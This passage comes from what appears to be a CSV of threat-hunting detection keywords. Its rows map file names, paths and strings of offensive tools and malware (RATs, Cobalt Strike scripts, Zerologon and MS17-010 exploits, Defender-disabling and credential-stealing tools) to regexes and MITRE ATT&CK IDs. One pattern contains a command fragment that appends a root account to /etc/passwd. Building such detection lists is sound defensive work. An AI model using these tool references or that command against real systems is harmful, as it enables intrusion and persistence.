TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","12785" "*/XRulez.exe*",".{0,1000}\/XRulez\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a 
compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","12786" "*/XRulez.zip*",".{0,1000}\/XRulez\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","12787" "*/xss_robertux.txt*",".{0,1000}\/xss_robertux\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","12788" "*/XtremeRat.exe*",".{0,1000}\/XtremeRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Molerats - Packrat - TA558","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12789" "*/XWorm.exe*",".{0,1000}\/XWorm\.exe.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","Malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","1","N/A","N/A","10","","N/A","","","","12790" 
"*/XWorm.exe*",".{0,1000}\/XWorm\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","12791" "*/XWorm.rar*",".{0,1000}\/XWorm\.rar.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","Malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","#linux","N/A","10","","N/A","","","","12792" "*/XWorm.zip*",".{0,1000}\/XWorm\.zip.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","12793" "*/XWorm-RAT-V*",".{0,1000}\/XWorm\-RAT\-V.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","12794" "*/xxe_fuzz.txt*",".{0,1000}\/xxe_fuzz\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","12795" "*/yanghaoi/_CNA*",".{0,1000}\/yanghaoi\/_CNA.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","12799" "*/ysoserial.jar*",".{0,1000}\/ysoserial\.jar.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#linux","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","12800" "*/ysoserial/*",".{0,1000}\/ysoserial\/.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","12801" "*/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php*",".{0,1000}\/zejius\/2HZG41Zw\/6Vtmo6w4yQ5tnsBHms64\.php.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","12806" "*/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin*",".{0,1000}\/zejius\/2HZG41Zw\/fJsnC6G4sFg2wsyn4shb\.bin.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration 
simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","12807" "*/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php*",".{0,1000}\/zejius\/5GPR0iy9\/6Vtmo6w4yQ5tnsBHms64\.php.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","12808" "*/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin*",".{0,1000}\/zejius\/5GPR0iy9\/fJsnC6G4sFg2wsyn4shb\.bin.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","12809" "*/ZeroHVCI.exe*",".{0,1000}\/ZeroHVCI\.exe.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","1","N/A","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","12810" "*/ZeroHVCI.git*",".{0,1000}\/ZeroHVCI\.git.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - 
T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","1","N/A","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","12811" "*/zerologon.cna*",".{0,1000}\/zerologon\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","N/A","10","10","158","37","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z","12812" "*/zerologon.py*",".{0,1000}\/zerologon\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest 
tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","12813" "*/zerologon.py*",".{0,1000}\/zerologon\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12814" "*/zhzyker/CVE-2020-5902*",".{0,1000}\/zhzyker\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/zhzyker/CVE-2020-5902/","1","0","#linux","N/A","N/A","1","13","8","2020-07-08T04:10:12Z","2020-07-08T04:02:07Z","12815" "*/ZipExec -*",".{0,1000}\/ZipExec\s\-.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","12816" "*/ZipExec.git*",".{0,1000}\/ZipExec\.git.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","12817" "*/ZipExec@latest*",".{0,1000}\/ZipExec\@latest.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - 
T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","12818" "*/zsh_executor/*.go*",".{0,1000}\/zsh_executor\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","12828" "*/zwjjustdoit/cve-2022-23131*",".{0,1000}\/zwjjustdoit\/cve\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0002 - TA0006 - TA0009","N/A","N/A","Exploitation tool","https://github.com/zwjjustdoit/cve-2022-23131","1","1","N/A","N/A","N/A","1","1","4","2022-02-21T04:55:57Z","2022-02-21T02:42:23Z","12829" "*/zzz_exploit.py*",".{0,1000}\/zzz_exploit\.py.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","12830" "*: Defeat-Defender-V1.2.0*",".{0,1000}\:\s\sDefeat\-Defender\-V1\.2\.0.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense
Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","12831" "*: Running Privilege Escalation Checks ===*",".{0,1000}\:\sRunning\sPrivilege\sEscalation\sChecks\s\=\=\=.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","12834" "*://wstunnel.server.com*",".{0,1000}\:\/\/wstunnel\.server\.com.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","12836" "*:: [BAD R.A.T.]-Company*",".{0,1000}\:\:\s\[BAD\sR\.A\.T\.\]\-Company.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12837" "*:: Dos-Gui by Mr Hawk*",".{0,1000}\:\:\sDos\-Gui\sby\sMr\sHawk.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - 
TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12838" "*:: RedBackdoorer*",".{0,1000}\:\:\sRedBackdoorer.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","12839" "*:: RedWatermarker*",".{0,1000}\:\:\sRedWatermarker.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","12840" "*:: Remove (s)AINT folder*",".{0,1000}\:\:\sRemove\s\(s\)AINT\sfolder.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","12841" "*::Info2FTP by Mr Hawk*",".{0,1000}\:\:Info2FTP\sby\sMr\sHawk.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12845" 
"*-:[GreenwooD]:- WinX Shell*",".{0,1000}\-\:\[GreenwooD\]\:\-\sWinX\sShell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","12846" "*:\ProgramData\demo.dll*",".{0,1000}\:\\ProgramData\\demo\.dll.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","12848" "*:\ProgramData\RecoverySystem\recoveryWindows.zip*",".{0,1000}\:\\ProgramData\\RecoverySystem\\recoveryWindows\.zip.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12849" "*:\ProgramData\SystemData\igfxCUIService.exe*",".{0,1000}\:\\ProgramData\\SystemData\\igfxCUIService\.exe.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12850" 
"*:\ProgramData\SystemData\tempo1.txt*",".{0,1000}\:\\ProgramData\\SystemData\\tempo1\.txt.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12851" "*:\ProgramData\SystemData\tempo2.txt*",".{0,1000}\:\\ProgramData\\SystemData\\tempo2\.txt.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12852" "*:\users\public\*.bat*",".{0,1000}\:\\users\\public\\.{0,1000}\.bat.{0,1000}","offensive_tool_keyword","_","scripts in public user folder","T1036 - T1055 - T1574","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12853" "*:\users\public\*.hta*",".{0,1000}\:\\users\\public\\.{0,1000}\.hta.{0,1000}","offensive_tool_keyword","_","scripts in public user folder","T1036 - T1055 - T1574","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12854" "*:\users\public\*.ps1*",".{0,1000}\:\\users\\public\\.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","_","scripts in public user folder","T1036 - T1055 - T1574","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12855"
"*:\users\public\*.vbs*",".{0,1000}\:\\users\\public\\.{0,1000}\.vbs.{0,1000}","offensive_tool_keyword","_","scripts in public user folder","T1036 - T1055 - T1574","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12856" "*:\Users\Public\Music\*.dll*",".{0,1000}\:\\Users\\Public\\Music\\.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","12857" "*:\windows\temp\blah.txt*",".{0,1000}\:\\windows\\temp\\blah\.txt.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","12858" "*:0:0:root:/root:/bin/bash"" >> /etc/passwd*",".{0,1000}\:0\:0\:root\:\/root\:\/bin\/bash\""\s\>\>\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","12859" "*:'123pentest'*",".{0,1000}\:\'123pentest\'.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","12860" "*:8070/reverseShellClients*",".{0,1000}\:8070\/reverseShellClients.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","12862" 
"*:8080/yara/file*",".{0,1000}\:8080\/yara\/file.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","12864" "*:8999/Payloads/*",".{0,1000}\:8999\/Payloads\/.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","N/A","10","10","55","4","2024-11-01T00:20:02Z","2023-04-19T10:59:30Z","12865" "*:9090*/api/v1.0/relays*",".{0,1000}\:9090.{0,1000}\/api\/v1\.0\/relays.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - 